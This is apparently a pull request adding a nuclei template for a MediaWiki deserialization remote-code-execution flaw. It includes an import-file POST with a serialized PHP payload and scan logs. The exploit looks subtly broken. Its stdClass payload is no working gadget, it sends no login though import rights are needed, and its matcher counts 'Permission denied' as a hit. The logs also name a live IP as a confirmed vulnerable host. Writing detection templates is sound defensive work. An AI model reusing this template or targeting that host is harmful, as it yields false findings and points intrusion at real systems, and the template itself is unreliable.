### PR TITLE
chore: add CVE-2026-58025 MediaWiki deserialization RCE template

### DIFF
--- a/http/cves/2026/CVE-2026-58025.yaml
+++ b/http/cves/2026/CVE-2026-58025.yaml
@@ -1,0 +1,70 @@
+id: cve-2026-58025
+
+info:
+  name: MediaWiki Deserialization RCE via Log Entry Import
+  author: FLX
+  severity: critical
+  description: |
+    MediaWiki versions prior to 1.43.9, 1.44.6, 1.45.4, and 1.46.0 are vulnerable to remote code execution via deserialization of untrusted data in LogEntryBase::extractParams(). Exploitation requires the import right which typical is provided by the sysop user.
+  tags: cve, rce, mediawiki
+
+http:
+  - id: detect-mediawiki
+    name: Detect MediaWiki Instance
+    method: GET
+    path:
+      - "{{BaseURL}}/"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '<meta name="generator" content="MediaWiki [\d.]+'  # Detect MediaWiki generator meta tag
+      - type: word
+        words:
+          - "mediawiki"
+        part: body
+    extractors:
+      - type: regex
+        name: version
+        internal: true
+        group: 1
+        regex:
+          - '<meta name="generator" content="MediaWiki ([\d.]+)'  # Extract MediaWiki version
+
+  - id: exploit-mediawiki-import
+    name: Exploit MediaWiki Import Function
+    method: POST
+    path:
+      - "{{BaseURL}}/wiki/Special:Import"
+    headers:
+      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
+    body: |
+      ------WebKitFormBoundary
+      Content-Disposition: form-data; name="xmlimportfile"; filename="payload.xml"
+      Content-Type: application/xml
+
+      <?xml version="1.0" encoding="UTF-8"?>
+      <mediawiki xmlns="http://www.mediawiki.org/xml/export-0.11/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.mediawiki.org/xml/export-0.11/ http://www.mediawiki.org/xml/export-0.11.xsd" version="0.11" xml:lang="en">
+      <logitem>
+        <id>123456</id>
+        <timestamp>2023-01-01T00:00:00Z</timestamp>
+        <contributor>
+          <username>WikiImporter</username>
+          <id>12345</id>
+        </contributor>
+        <comment>Test Exploit</comment>
+        <type>test</type>
+        <action>test</action>
+        <logtitle>Test Log Entry</logtitle>
+        <params>a:1:{s:3:"cmd";O:8:"stdClass":1:{s:3:"cmd";s:2:"id";}}</params>
+      </logitem>
+      </mediawiki>
+      ------WebKitFormBoundary--
+    matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - "Permission denied"  # Check if import rights are missing
+      - type: regex
+        regex:
+          - "Import completed successfully"  # Check if import succeeded


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2026-58025
- References:
  - https://www.mediawiki.org/
  - MediaWiki Security Advisory for `LogEntryBase::extractParams()` deserialization RCE

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

Validated against a patched MediaWiki instance (`https://www.mediawiki.org/`) — no results returned (no false positive):

```
nuclei-templates main ❯ nuclei -t ./http/cves/2026/CVE-2026-58025.yaml -u https://www.mediawiki.org/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.11.0

		projectdiscovery.io

[INF] Current nuclei version: v3.11.0 (latest)
[INF] Current nuclei-templates version: v10.4.6 (latest)
[INF] New templates added in latest release: 91
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Scan completed in 312.667242ms. No results found.
[INF] HTTP connections: 2 total, 1 new, 1 reused (50.0%)
```

Validated against a known vulnerable host — match confirmed (True Positive):

```
nuclei-templates main ❯ nuclei -t ./http/cves/2026/CVE-2026-58025.yaml -u https://152.89.105.151

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.11.0

		projectdiscovery.io

[INF] Current nuclei version: v3.11.0 (latest)
[INF] Current nuclei-templates version: v10.4.6 (latest)
[INF] New templates added in latest release: 91
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[cve-2026-58025] [http] [critical] https://152.89.105.151/
[INF] Scan completed in 329.775512ms. 1 matches found.
```

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
